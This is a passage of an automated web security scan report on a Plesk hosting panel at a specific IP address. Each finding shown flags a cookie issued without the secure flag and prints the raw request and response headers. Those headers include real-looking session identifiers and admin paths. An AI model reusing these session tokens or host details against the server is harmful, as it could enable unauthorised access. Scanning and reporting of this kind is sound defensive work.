Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:29 GMT
Connection: close
Content-Length: 19814

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.90. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:25 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.91. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:51 GMT
Connection: close
Content-Length: 19828

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.92. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:26 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.93. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:41 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:42 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.94. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:54 GMT
Connection: close
Content-Length: 13756

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.95. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:47 GMT
Connection: close
Content-Length: 19804

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.96. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/upload/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/upload/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:02:22 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:02:21 GMT
Content-Length: 15554

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.97. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/schedule/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/schedule/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:01:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:01:33 GMT
Content-Length: 21387

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.98. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/task@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/task@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/task@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:30 GMT
Connection: close
Content-Length: 20734

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.99. https://50.22.21.242:8443/plesk/client@1/domain@1/dns/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/dns/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/dns/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:35:56 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:36:00 GMT
Content-Length: 0


4.100. https://50.22.21.242:8443/plesk/client@1/domain@1/traffic-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/traffic-hosting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/traffic-hosting HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/statistics
Cookie: certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:15:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:15:07 GMT
Content-Length: 20261

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.101. https://50.22.21.242:8443/plesk/client@1/shared-ssl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/shared-ssl/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/shared-ssl/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:04:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:04:20 GMT
Content-Length: 15652

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.102. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:49 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:49 GMT
Connection: close
Content-Length: 18729

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.103. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:48 GMT
Server: Microsoft-IIS/7.5
